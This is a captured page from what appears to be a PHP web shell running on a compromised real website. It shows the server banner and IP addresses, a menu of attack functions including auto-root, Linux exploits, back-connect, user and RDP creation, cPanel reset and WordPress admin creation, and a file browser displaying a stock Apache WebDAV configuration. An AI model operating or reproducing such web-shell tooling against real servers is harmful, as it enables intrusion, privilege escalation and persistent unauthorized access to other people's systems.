Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
httpd /
[ HOME SHELL ]
Name
Size
Permission
Action
ABOUT_APACHE
13.18
KB
-rw-r--r--
CHANGES
256.74
KB
-rw-r--r--
LICENSE
24.88
KB
-rw-r--r--
NOTICE
720
B
-rw-r--r--
README
4.53
KB
-rw-r--r--
VERSIONING
7.99
KB
-rw-r--r--
httpd-autoindex.conf
2.86
KB
-rw-r--r--
httpd-dav.conf
1.74
KB
-rw-r--r--
httpd-default.conf
2.87
KB
-rw-r--r--
httpd-info.conf
1.09
KB
-rw-r--r--
httpd-languages.conf
4.96
KB
-rw-r--r--
httpd-manual.conf
1.36
KB
-rw-r--r--
httpd-mpm.conf
4.34
KB
-rw-r--r--
httpd-multilang-errordoc.conf
2.16
KB
-rw-r--r--
httpd-vhosts.conf
1.44
KB
-rw-r--r--
instance.conf
10.83
KB
-rw-r--r--
proxy-html.conf
3.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : httpd-dav.conf
# # Distributed authoring and versioning (WebDAV) # # Required modules: mod_alias, mod_auth_digest, mod_authn_core, mod_authn_file, # mod_authz_core, mod_authz_user, mod_dav, mod_dav_fs, # mod_setenvif # The following example gives DAV write access to a directory called # "uploads" under the ServerRoot directory. # # The User/Group specified in httpd.conf needs to have write permissions # on the directory where the DavLockDB is placed and on any directory where # "Dav On" is specified. DavLockDB "/var/lib/dav/DavLock" Alias /uploads "/var/www/uploads" <Directory "/var/www/uploads"> Dav On AuthType Digest AuthName DAV-upload # You can use the htdigest program to create the password database: # htdigest -c "/etc/httpd/conf/user.passwd" DAV-upload admin AuthUserFile "/etc/httpd/conf/user.passwd" AuthDigestProvider file # Allow universal read-access, but writes are restricted # to the admin user. <RequireAny> Require method GET POST OPTIONS Require user admin </RequireAny> </Directory> # # The following directives disable redirects on non-GET requests for # a directory that does not include the trailing slash. This fixes a # problem with several clients that do not appropriately handle # redirects for folders with DAV methods. # BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully BrowserMatch "MS FrontPage" redirect-carefully BrowserMatch "^WebDrive" redirect-carefully BrowserMatch "^WebDAVFS/1.[01234]" redirect-carefully BrowserMatch "^gnome-vfs/1.0" redirect-carefully BrowserMatch "^XML Spy" redirect-carefully BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully BrowserMatch " Konqueror/4" redirect-carefully
Close